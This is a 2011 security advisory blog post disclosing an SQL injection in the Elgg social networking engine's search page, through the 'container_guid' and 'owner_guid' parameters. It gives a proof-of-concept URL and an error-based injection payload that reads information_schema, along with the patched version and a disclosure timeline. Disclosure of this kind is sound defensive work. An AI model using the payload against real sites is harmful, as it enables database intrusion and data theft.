Elgg 1.8 beta2 and prior to 1.7.11 'container_guid' and 'owner_guid' SQL Injection

Monday, August 15, 2011
##################################################
Elgg 1.8 beta2 and prior to 1.7.11 'container_guid' and 'owner_guid' SQL Injection
Vendor URL: http://www.elgg.org/
Advisore: http://lostmon.blogspot.com/2011/08/elgg-18-beta2-and-prior-to-1711.html
Vendor notify: YES exploit available: YES
##################################################

###################
Description By vendor
###################

Elgg is an award-winning social networking engine, delivering
the building blocks that enable businesses, schools, universities
and associations to create their own fully-featured social networks
and applications. Organizations with networks powered by Elgg
include: Australian Government, British Government, Federal Canadian
Government, MITRE, The World Bank, UNESCO, NASA, Stanford University,
Johns Hopkins University and more (http://elgg.org/powering.php)


######################
Vulnerability Description
######################

Elgg contains a flaw that may allow an attacker to carry out an
SQL injection attack. The issue is due to the script not properly
sanitizing user-supplied input to 'container_guid' and 'owner_guid'
variables upon submision to 'mod/search/pages/search/index.php'
This may allow an attacker to inject or manipulate SQL queries
in the backend database.

################
Versions afected
################

Elgg 1.8 beta2 vulnerable
Elgg 1.7.10 and prior versions vulnerables
Elgg 1.7.11 not vulnerable

#################
Tecnical details
#################

Injection type is Integer and it only can be exploit via
Mysql error based injection method, it works with
'magic_quotes_gpc' set to 'on' or 'off'


######################
Proof Of Concept
######################

If you know what is error based injection... you know how to use it ;)

URL => http://localhost/elgg/search/?q=someword&search_type=tags&container_guid=7826'

Injections:

and(select 1 from(select count(*),concat((select (select %column_name%) from
`information_schema`.tables limit 0,1),floor(rand(0)*2))x from
`information_schema`.tables
group by x)a) and 1=1

Count(table_name) of information_schema.tables where
table_schema=0x74657374 is 75

Count(column_name) of information_schema.columns where
table_schema=0x74657374 and table_name=0x62616E6C697374 is 4

################
Solution
###############

The vendor has release a updated version to solve this
issue and others see changelog and update your Elgg
instalation to 1.7.11


###############
Timeline
###############

Discovered :July 30, 2011
Vendor Notify:July 30, 2011
Vendor response:July 30, 2011
Vendor Patch: August 15, 2011
Public Disclosure: August 15, 2011

########################## €nd ########################

Atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
 

Browse

About:Me

My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com

La curiosidad es lo que hace
mover la mente...